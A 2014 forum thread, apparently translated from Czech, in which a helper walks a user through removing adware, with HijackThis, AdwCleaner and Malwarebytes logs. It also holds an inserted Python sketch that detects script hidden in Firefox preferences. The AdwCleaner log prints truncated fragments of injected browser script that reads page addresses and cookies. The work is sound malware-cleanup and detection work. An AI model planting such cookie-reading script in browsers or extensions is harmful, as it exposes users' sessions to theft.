
Antivirus keeps reporting a problem - please check my log  Solved

Posted: 18 Aug 2014 19:41
by Falla Džej
Hello, please check my log. After reinstalling the PC I installed a few "basic" programs, but Avast now pops up an infection alert roughly every minute. The target path of the infected files always leads to firefox.cz.



Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 19:40:52, on 18.8.2014
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v11.0 (11.00.9600.17239)
Boot mode: Normal

Running processes:
C:\Program Files\AVAST Software\Avast\avastui.exe
C:\Program Files (x86)\Skype\Phone\Skype.exe
C:\Program Files (x86)\Mozilla Firefox\firefox.exe
C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe
C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_14_0_0_179.exe
C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_14_0_0_179.exe
C:\Users\Jakub\Downloads\hijackthis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://websearch.wonderfulsearches.info ... Z&unqvl=60
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/p/?LinkId=255141
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://websearch.wonderfulsearches.info ... Z&unqvl=60
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
F2 - REG:system.ini: UserInit=userinit.exe
O2 - BHO: avast! Online Security - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll
O4 - HKLM\..\Run: [AvastUI.exe] "C:\Program Files\AVAST Software\Avast\AvastUI.exe" /nogui
O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-19\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-20\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'NETWORK SERVICE')
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: AMD External Events Utility - Unknown owner - C:\Windows\system32\atiesrxx.exe (file missing)
O23 - Service: avast! Antivirus - AVAST Software - C:\Program Files\AVAST Software\Avast\AvastSvc.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\ieetwcollectorres.dll,-1000 (IEEtwCollectorService) - Unknown owner - C:\Windows\system32\IEEtwCollector.exe (file missing)
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\Wat\WatUX.exe,-601 (WatAdminSvc) - Unknown owner - C:\Windows\system32\Wat\WatAdminSvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

--
End of file - 5784 bytes

Re: Antivirus keeps reporting a problem - please check my log

Posted: 19 Aug 2014 09:46
by jaro3
Download ATF Cleaner
Double-click ATF Cleaner.exe, click Select All Found, then:
- If you use Firefox (Mozilla), click Firefox at the top and choose: Select All, then click Empty Selected.
- If you use Opera, click Opera at the top and choose: Select All, then click Empty Selected. Then click Main (the main page) and click Empty Selected.
After cleaning, click Exit to close the program.
ATF-Cleaner is a simple tool for removing history from the web browser. The program can remove the cache, cookies, history and other traces of browsing the Internet. Supported browsers include Internet Explorer, Firefox and Opera. The application can also remove Windows temporary files, empty the Recycle Bin, etc.

- If you use only Google Chrome, you do not need to use ATF.


Download TFC
Open the file and close all other windows. Click Start to begin the process. The program should not take long.
The PC should then restart; if it does not, restart it yourself.

Download AdwCleaner (by Xplode)
http://www.bleepingcomputer.com/download/adwcleaner/

Save it to your desktop
Close all programs, windows and browsers
Run the program by double-clicking it and click "Prohledat-Scan"
After the scan a log appears (it is also saved on the system disk as AdwCleaner[R?].txt); paste its entire contents here.

Download Malwarebytes' Anti-Malware
- During installation, untick "Enable free trial of Malwarebytes' Anti-Malware Premium"
Install it and run it
- at the end of the installation make sure both options are selected/ticked:
Update Malwarebytes' Anti-Malware and Launch Malwarebytes' Anti-Malware; if so, click the Finish button
- if an update is found, it will be downloaded and installed
- the program then starts; click Scan Now and
- after the program finishes, a prompt appears at the bottom right; click Copy to Clipboard and paste the entire log here.

- then click the Exit button; a prompt appears, so choose Yes
(do not delete anything yet!).

If there are problems, run it in safe mode.

Re: Antivirus keeps reporting a problem - please check my log

Posted: 19 Aug 2014 19:45
by Falla Džej
# AdwCleaner v3.307 - Report created 19/08/2014 at 19:43:37
# Updated 17/08/2014 by Xplode
# Operating System : Windows 7 Ultimate Service Pack 1 (64 bits)
# Username : Jakub - JAKUB-PC
# Running from : C:\Users\Jakub\Downloads\adwcleaner_3.307.exe
# Option : Scan

***** [ Services ] *****


***** [ Files / Folders ] *****

File Found : C:\Users\Jakub\AppData\Roaming\Mozilla\Firefox\Profiles\xlin0hej.default\searchplugins\WebSearch.xml
File Found : C:\Windows\System32\GroupPolicy\Machine\Registry.pol
Folder Found : C:\Program Files (x86)\Adblocker
Folder Found : C:\Program Files (x86)\Adblocker
Folder Found : C:\Program Files (x86)\EZDownloader
Folder Found : C:\Program Files (x86)\MySearch
Folder Found : C:\Program Files (x86)\ppRicceCihop
Folder Found : C:\Program Files (x86)\priacechop
Folder Found : C:\Program Files (x86)\priCEchop
Folder Found : C:\Program Files (x86)\SW-Booster
Folder Found : C:\ProgramData\Adblocker
Folder Found : C:\ProgramData\Adblocker
Folder Found : C:\ProgramData\MySearch
Folder Found : C:\ProgramData\ppRicceCihop
Folder Found : C:\ProgramData\priacechop
Folder Found : C:\ProgramData\priCEchop
Folder Found : C:\Users\Administrator\AppData\Local\Chromatic Browser
Folder Found : C:\Users\Administrator\AppData\Local\torch
Folder Found : C:\Users\Guest\AppData\Local\Chromatic Browser
Folder Found : C:\Users\Guest\AppData\Local\torch
Folder Found : C:\Users\Jakub\AppData\Local\Chromatic Browser
Folder Found : C:\Users\Jakub\AppData\Local\torch

***** [ Scheduled Tasks ] *****


***** [ Shortcuts ] *****


***** [ Registry ] *****

Key Found : HKCU\Software\AppDataLow\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}
Key Found : HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}
Key Found : HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}
Key Found : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}
Key Found : HKCU\Software\RegisteredApplicationsEx
Key Found : [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}
Key Found : [x64] HKCU\Software\RegisteredApplicationsEx
Key Found : HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
Key Found : HKLM\SOFTWARE\{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}
Key Found : HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}
Key Found : HKLM\SOFTWARE\{77D46E27-0E41-4478-87A6-AABE6FBCF252}
Key Found : HKLM\SOFTWARE\Classes\Interface\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{E2343056-CC08-46AC-B898-BFC7ACF4E755}
Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\Extension Compatibility\{74F475FA-6C75-43BD-AAB9-ECDA6184F600}
Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4820778D-AB0D-6D18-C316-52A6A0E1D507}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5F189DF5-2D05-472B-9091-84D9848AE48B}{d0e87c27}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C670DCAE-E392-AA32-6F42-143C7FC4BDFD}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-2060245759
Key Found : HKLM\SOFTWARE\SW-Booster
Key Found : HKLM\SOFTWARE\systweak
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{EAF749DC-CD87-4B04-B22A-D4AC3FBCB2BC}

***** [ Browsers ] *****

-\\ Internet Explorer v11.0.9600.17239

Setting Found : HKCU\Software\Microsoft\Internet Explorer\Main [Start Page] - hxxp://websearch.wonderfulsearches.info ... Z&unqvl=60
Setting Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Start Page] - hxxp://websearch.wonderfulsearches.info ... Z&unqvl=60

-\\ Mozilla Firefox v31.0 (x86 cs)

[ File : C:\Users\Jakub\AppData\Roaming\Mozilla\Firefox\Profiles\xlin0hej.default\prefs.js ]

Line Found : user_pref("browser.search.defaultenginename,S", "WebSearch");
Line Found : user_pref("browser.search.defaulturl", "hxxp://websearch.wonderfulsearches.info/?pid=2145&r=2014/08/17&hid=2400403269968452107&lg=EN&cc=CZ&unqvl=60&l=1&q=");
Line Found : user_pref("browser.search.order.1", "WebSearch");
Line Found : user_pref("browser.search.order.1,S", "WebSearch");
Line Found : user_pref("browser.search.selectedEngine,S", "WebSearch");
Line Found : user_pref("extensions.MOHby0gw.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorob[...]
Line Found : user_pref("extensions.PQi53ff4a.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumoro[...]
Line Found : user_pref("extensions.iGA.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo.net[...]
Line Found : user_pref("extensions.jbWUo5IK3b.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumor[...]
Line Found : user_pref("extensions.sytlW.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo.n[...]
Line Found : user_pref("keyword.URL", "hxxp://websearch.wonderfulsearches.info/?pid=2145&r=2014/08/17&hid=2400403269968452107&lg=EN&cc=CZ&unqvl=60&l=1&q=");

-\\ Google Chrome v

*************************

AdwCleaner[R0].txt - [5757 octets] - [19/08/2014 19:43:37]

########## EOF - C:\AdwCleaner\AdwCleaner[R0].txt - [5817 octets] ##########
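
The AdwCleaner log above flags `prefs.js` lines of three kinds: search-URL prefs, search-engine-name prefs, and `extensions.<random>.scode` prefs that hold script. The same check as a Python sketch, added here as an example that is not part of the thread or of any tool named in it; the sample `prefs.js` text, the allowlists and the function names are constructed for illustration.

```python
import json
import re
from urllib.parse import urlparse

# One user_pref("name", value); entry per line, as Firefox writes prefs.js.
PREF_RE = re.compile(r'^\s*user_pref\(\s*"((?:[^"\\]|\\.)*)"\s*,\s*(.*?)\s*\);\s*$')

# Pref names taken from the AdwCleaner log in this thread.
URL_PREFS = ("keyword.URL", "browser.search.defaulturl")
ENGINE_PREFS = ("browser.search.defaultenginename",
                "browser.search.selectedEngine",
                "browser.search.order.")
# Substrings that indicate script stored inside a preference value.
SCRIPT_MARKERS = ("(function(", "document.cookie", "eval(")

# Constructed sample input (not copied from the user's machine).
SAMPLE_PREFS = r'''
# Mozilla User Preferences
user_pref("browser.search.selectedEngine", "ExampleSearch");
user_pref("browser.search.order.1,S", "ExampleSearch");
user_pref("keyword.URL", "http://search.example.invalid/?pid=0000&q=");
user_pref("browser.search.defaulturl", "http://www.google.com/search?q=");
user_pref("extensions.aBcD1234.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"example\")>-1){return;}}catch(e){}})();");
user_pref("extensions.blocklist.enabled", true);
user_pref("extensions.lastAppVersion", "31.0");
'''


def parse_prefs(text):
    """Return (line_number, name, value) for every user_pref line."""
    prefs = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = PREF_RE.match(line)
        if not m:
            continue  # comments, blank lines, anything that is not a pref
        name, raw = m.group(1), m.group(2)
        try:
            value = json.loads(raw)      # strings, numbers, true/false
        except ValueError:
            value = raw.strip('"')       # JS escapes that JSON does not accept
        prefs.append((lineno, name, value))
    return prefs


def audit_prefs(text, allowed_hosts, allowed_engines):
    """Flag search prefs outside the allowlists and script stored in extension prefs."""
    findings = []
    for lineno, name, value in parse_prefs(text):
        if not isinstance(value, str):
            continue
        base = name.split(",", 1)[0]     # the log shows variants such as "...,S"
        if base in URL_PREFS:
            host = (urlparse(value).hostname or "").lower()
            if value and host not in allowed_hosts:
                findings.append((lineno, name, "search-url", host))
        elif base.startswith(ENGINE_PREFS):
            if value not in allowed_engines:
                findings.append((lineno, name, "search-engine", value))
        elif base.startswith("extensions."):
            if base.endswith(".scode") or any(mk in value for mk in SCRIPT_MARKERS):
                findings.append((lineno, name, "script-in-pref", value[:40]))
    return findings


if __name__ == "__main__":
    # Allowlists are assumptions: what the owner of this profile expects to see.
    for finding in audit_prefs(SAMPLE_PREFS, {"www.google.com"}, {"Google"}):
        print(finding)
```

Run against a copy of the profile's `prefs.js` with Firefox closed, since Firefox rewrites the file on exit.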

Re: Antivirus keeps reporting a problem - please check my log

Posted: 19 Aug 2014 19:58
by Falla Džej
Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 19.8.2014
Scan Time: 19:47:11
Logfile:
Administrator: Yes

Version: 2.00.2.1012
Malware Database: v2014.08.19.08
Rootkit Database: v2014.08.16.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: Jakub

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 305191
Time Elapsed: 10 min, 49 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 56
PUP.Optional.Preload, HKLM\SOFTWARE\CLASSES\CLSID\{EB886C70-281E-BBA0-BB6D-F39F2A11153C}, , [d59f07c1aecd86b0a976c3dc4db4a25e],
PUP.Optional.Preload, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\BROWSER HELPER OBJECTS\{EB886C70-281E-BBA0-BB6D-F39F2A11153C}, , [d59f07c1aecd86b0a976c3dc4db4a25e],
PUP.Optional.Preload, HKLM\SOFTWARE\CLASSES\pricechOp.pricechOp, , [d59f07c1aecd86b0a976c3dc4db4a25e],
PUP.Optional.Preload, HKLM\SOFTWARE\CLASSES\pricechOp.pricechOp.3.9, , [d59f07c1aecd86b0a976c3dc4db4a25e],
PUP.Optional.Preload, HKLM\SOFTWARE\WOW6432NODE\CLASSES\pricechOp.pricechOp, , [d59f07c1aecd86b0a976c3dc4db4a25e],
PUP.Optional.Preload, HKLM\SOFTWARE\WOW6432NODE\CLASSES\pricechOp.pricechOp.3.9, , [d59f07c1aecd86b0a976c3dc4db4a25e],
PUP.Optional.Preload, HKLM\SOFTWARE\WOW6432NODE\CLASSES\CLSID\{EB886C70-281E-BBA0-BB6D-F39F2A11153C}, , [d59f07c1aecd86b0a976c3dc4db4a25e],
PUP.Optional.Preload, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\PREAPPROVED\{EB886C70-281E-BBA0-BB6D-F39F2A11153C}, , [d59f07c1aecd86b0a976c3dc4db4a25e],
PUP.Optional.Preload, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\PREAPPROVED\{EB886C70-281E-BBA0-BB6D-F39F2A11153C}, , [d59f07c1aecd86b0a976c3dc4db4a25e],
PUP.Optional.Preload, HKLM\SOFTWARE\CLASSES\CLSID\{EB886C70-281E-BBA0-BB6D-F39F2A11153C}\INPROCSERVER32, , [d59f07c1aecd86b0a976c3dc4db4a25e],
PUP.Optional.Preload, HKLM\SOFTWARE\CLASSES\CLSID\{D3D758FC-2B7D-C142-F7D3-76C52BD68872}, , [2f45b4145625ec4ac659b1ee3cc5916f],
PUP.Optional.Preload, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\BROWSER HELPER OBJECTS\{D3D758FC-2B7D-C142-F7D3-76C52BD68872}, , [2f45b4145625ec4ac659b1ee3cc5916f],
PUP.Optional.Preload, HKLM\SOFTWARE\CLASSES\prIccechop.prIccechop, , [2f45b4145625ec4ac659b1ee3cc5916f],
PUP.Optional.Preload, HKLM\SOFTWARE\CLASSES\prIccechop.prIccechop.3.9, , [2f45b4145625ec4ac659b1ee3cc5916f],
PUP.Optional.Preload, HKLM\SOFTWARE\WOW6432NODE\CLASSES\prIccechop.prIccechop, , [2f45b4145625ec4ac659b1ee3cc5916f],
PUP.Optional.Preload, HKLM\SOFTWARE\WOW6432NODE\CLASSES\prIccechop.prIccechop.3.9, , [2f45b4145625ec4ac659b1ee3cc5916f],
PUP.Optional.Preload, HKLM\SOFTWARE\WOW6432NODE\CLASSES\CLSID\{D3D758FC-2B7D-C142-F7D3-76C52BD68872}, , [2f45b4145625ec4ac659b1ee3cc5916f],
PUP.Optional.Preload, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\PREAPPROVED\{D3D758FC-2B7D-C142-F7D3-76C52BD68872}, , [2f45b4145625ec4ac659b1ee3cc5916f],
PUP.Optional.Preload, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\PREAPPROVED\{D3D758FC-2B7D-C142-F7D3-76C52BD68872}, , [2f45b4145625ec4ac659b1ee3cc5916f],
PUP.Optional.Preload, HKLM\SOFTWARE\CLASSES\CLSID\{D3D758FC-2B7D-C142-F7D3-76C52BD68872}\INPROCSERVER32, , [2f45b4145625ec4ac659b1ee3cc5916f],
PUP.Optional.Preload, HKLM\SOFTWARE\CLASSES\CLSID\{8186D2C6-66D8-C8C4-A740-C5634313A63D}, , [274d1fa9cfac1620db443b64db26629e],
PUP.Optional.Preload, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\BROWSER HELPER OBJECTS\{8186D2C6-66D8-C8C4-A740-C5634313A63D}, , [274d1fa9cfac1620db443b64db26629e],
PUP.Optional.Preload, HKLM\SOFTWARE\CLASSES\priaceChop.priaceChop, , [274d1fa9cfac1620db443b64db26629e],
PUP.Optional.Preload, HKLM\SOFTWARE\CLASSES\priaceChop.priaceChop.3.9, , [274d1fa9cfac1620db443b64db26629e],
PUP.Optional.Preload, HKLM\SOFTWARE\WOW6432NODE\CLASSES\priaceChop.priaceChop, , [274d1fa9cfac1620db443b64db26629e],
PUP.Optional.Preload, HKLM\SOFTWARE\WOW6432NODE\CLASSES\priaceChop.priaceChop.3.9, , [274d1fa9cfac1620db443b64db26629e],
PUP.Optional.Preload, HKLM\SOFTWARE\WOW6432NODE\CLASSES\CLSID\{8186D2C6-66D8-C8C4-A740-C5634313A63D}, , [274d1fa9cfac1620db443b64db26629e],
PUP.Optional.Preload, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\PREAPPROVED\{8186D2C6-66D8-C8C4-A740-C5634313A63D}, , [274d1fa9cfac1620db443b64db26629e],
PUP.Optional.Preload, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\PREAPPROVED\{8186D2C6-66D8-C8C4-A740-C5634313A63D}, , [274d1fa9cfac1620db443b64db26629e],
PUP.Optional.Preload, HKLM\SOFTWARE\CLASSES\CLSID\{8186D2C6-66D8-C8C4-A740-C5634313A63D}\INPROCSERVER32, , [274d1fa9cfac1620db443b64db26629e],
PUP.Optional.Preload, HKLM\SOFTWARE\CLASSES\CLSID\{9A28C5C3-6EE1-6792-65B5-E706A7A608EF}, , [482c38900675ed49dd42a6f9649db848],
PUP.Optional.Preload, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\BROWSER HELPER OBJECTS\{9A28C5C3-6EE1-6792-65B5-E706A7A608EF}, , [482c38900675ed49dd42a6f9649db848],
PUP.Optional.Preload, HKLM\SOFTWARE\CLASSES\Adblocker.Adblocker, , [482c38900675ed49dd42a6f9649db848],
PUP.Optional.Preload, HKLM\SOFTWARE\CLASSES\Adblocker.Adblocker.1.0, , [482c38900675ed49dd42a6f9649db848],
PUP.Optional.Preload, HKLM\SOFTWARE\WOW6432NODE\CLASSES\Adblocker.Adblocker, , [482c38900675ed49dd42a6f9649db848],
PUP.Optional.Preload, HKLM\SOFTWARE\WOW6432NODE\CLASSES\Adblocker.Adblocker.1.0, , [482c38900675ed49dd42a6f9649db848],
PUP.Optional.Preload, HKLM\SOFTWARE\WOW6432NODE\CLASSES\CLSID\{9A28C5C3-6EE1-6792-65B5-E706A7A608EF}, , [482c38900675ed49dd42a6f9649db848],
PUP.Optional.Preload, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\PREAPPROVED\{9A28C5C3-6EE1-6792-65B5-E706A7A608EF}, , [482c38900675ed49dd42a6f9649db848],
PUP.Optional.Preload, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\PREAPPROVED\{9A28C5C3-6EE1-6792-65B5-E706A7A608EF}, , [482c38900675ed49dd42a6f9649db848],
PUP.Optional.Preload, HKLM\SOFTWARE\CLASSES\CLSID\{9A28C5C3-6EE1-6792-65B5-E706A7A608EF}\INPROCSERVER32, , [482c38900675ed49dd42a6f9649db848],
PUP.Optional.Preload, HKLM\SOFTWARE\CLASSES\CLSID\{CA49D376-22C3-8205-FB0E-E9A6774CDDE1}, , [83f104c447343afc0b14c0dfc9389f61],
PUP.Optional.Preload, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\BROWSER HELPER OBJECTS\{CA49D376-22C3-8205-FB0E-E9A6774CDDE1}, , [83f104c447343afc0b14c0dfc9389f61],
PUP.Optional.Preload, HKLM\SOFTWARE\CLASSES\MySearch.MySearch, , [83f104c447343afc0b14c0dfc9389f61],
PUP.Optional.Preload, HKLM\SOFTWARE\CLASSES\MySearch.MySearch.2.1, , [83f104c447343afc0b14c0dfc9389f61],
PUP.Optional.Preload, HKLM\SOFTWARE\WOW6432NODE\CLASSES\MySearch.MySearch, , [83f104c447343afc0b14c0dfc9389f61],
PUP.Optional.Preload, HKLM\SOFTWARE\WOW6432NODE\CLASSES\MySearch.MySearch.2.1, , [83f104c447343afc0b14c0dfc9389f61],
PUP.Optional.Preload, HKLM\SOFTWARE\WOW6432NODE\CLASSES\CLSID\{CA49D376-22C3-8205-FB0E-E9A6774CDDE1}, , [83f104c447343afc0b14c0dfc9389f61],
PUP.Optional.Preload, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\PREAPPROVED\{CA49D376-22C3-8205-FB0E-E9A6774CDDE1}, , [83f104c447343afc0b14c0dfc9389f61],
PUP.Optional.Preload, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\PREAPPROVED\{CA49D376-22C3-8205-FB0E-E9A6774CDDE1}, , [83f104c447343afc0b14c0dfc9389f61],
PUP.Optional.Preload, HKLM\SOFTWARE\CLASSES\CLSID\{CA49D376-22C3-8205-FB0E-E9A6774CDDE1}\INPROCSERVER32, , [83f104c447343afc0b14c0dfc9389f61],
PUP.Optional.SWBooster.A, HKLM\SOFTWARE\WOW6432NODE\SW-Booster, , [b6be30984c2f85b1ab0b7976cc36e719],
PUP.Optional.FastSearchings, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}, , [83f1587099e20d29509bf058a361d828],
PUP.Optional.Booster.A, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\S-2060245759, , [de96b612b9c240f689ed6488cb37d52b],
PUP.Optional.Booster.A, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{5F189DF5-2D05-472B-9091-84D9848AE48B}{d0e87c27}, , [b6be9137ef8c2511d89f9e4e17eba25e],
PUP.Optional.Booster, HKLM\SOFTWARE\WOW6432NODE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_D0E87C27, , [f77d01c7df9c58de03ed6fd9ec1857a9],
PUP.Optional.WebSearchInfo, HKU\S-1-5-21-288487796-1725444996-988690671-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}, , [185c3395daa172c42b1c4ee7c63e7888],

Registry Values: 2
PUP.Optional.Booster, HKLM\SOFTWARE\WOW6432NODE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_D0E87C27|svn, SW-Sustainer, , [f77d01c7df9c58de03ed6fd9ec1857a9]
PUP.Optional.WebSearchInfo, HKU\S-1-5-21-288487796-1725444996-988690671-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES|DefaultScope, {BB74DE59-BC4C-4172-9AC4-73315F71CFFE}, , [de967553cbb08bab94b4a293e81c13ed]

Registry Data: 2
